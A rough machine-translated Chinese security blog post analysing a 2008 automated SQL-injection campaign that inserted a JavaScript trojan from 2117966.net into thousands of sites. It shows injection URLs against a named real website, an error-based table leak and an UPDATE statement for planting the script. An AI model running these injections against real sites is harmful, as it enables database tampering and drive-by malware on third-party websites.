Analysis of attacks on tens of thousands of websites, such as Trend Micro

BY: rayh4c.cn 1. first found the attack on the Internet news report http://www.2cto.com/200803/24504.htmlhttp://www.nsfocus.net/news/6697http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a

BY: rayh4c.cn

I. I first found the news and reports of this attack on the Internet

Http://www.2cto.com/ OS /200803/24504.html

Http://www.nsfocus.net/news/6697

Http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html

You can search for related hacked pages through GOOGLE.

Http://www.google.cn/search? Hl = zh-CN & q = site % 3Atrendmicro.com ++ www.2117966.net + fuckjp. js & btnG = Google + % E6 % 90% 9C % E7 % B4 % A2 & meta = & aq = f

The Trend Micro page is inserted with a Trojan horse related to http://www.2117966.net/fuckjp.js.

2. directly search for JS-related information

Http://www.google.cn/search? Complete = 1 & hl = zh-CN & newwindow = 1 & q = www.2117966.net + fuckjp. js & meta = & aq = f

12,500 matching results were found. the returned results are all JavaScript Trojans inserted on the current page.

Analysis shows that the hacked pages have the following features:

1. the websites on the modified pages are all ASP + MSSQL architectures.

2. the SQL injection vulnerability exists on the modified pages.

3. take one of the infected Trojan pages and launch a simulated SQL injection attack:

1. http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp? Person = 5162

This link has obvious SQL injection. for the person parameter injection statement having 1 = 1, the table name of the injection point on the current page is coordinator and the field name is exposed.
ShCoordinatorSurame.

Http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp? Person = 5162
Having 1 = 1

------------------
Microsoft ole db Provider for ODBC Drivers error 80040e14 ′
[Microsoft] [odbc SQL Server Driver] [SQL Server] Column
Coordinator. ShCoordinatorSurame is invalid in the select list
Because it is not contained in an aggregate function and there is no
Group by clause.
/Wisard/shared/asp/Generalpersoninfo/StrPersonOverview. asp, line 20
-------------------

2. modify the name of the exposed table on the current page. the content of the field name is the JavaScript code inserted to implement Trojan Horse mounting.

Http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp? Person = 5162; update
Coordinator set ShCoordinatorSurame = Where 1 = 1 --

Modify the content of the ShCoordinatorSurame field in the coordinator table And set 1 = 1 to true logical conditions to modify the current page.
Query the data content.

You can directly mount a Trojan on a page with an SQL injection point.

IV. Summary.

The process of this large-scale attack should be automated:

1. collect SQL injection vulnerabilities on tens of thousands of websites in batches using advanced scanning technology.

2. Automated SQL injection and Trojan Horse mounting for vulnerability attacks.

Today, although the SQL injection vulnerability is very old, the hacker's technology of simultaneously attacking and mounting Trojans on the HiChina website within one day is amazing, and even security companies like the trend are not spared.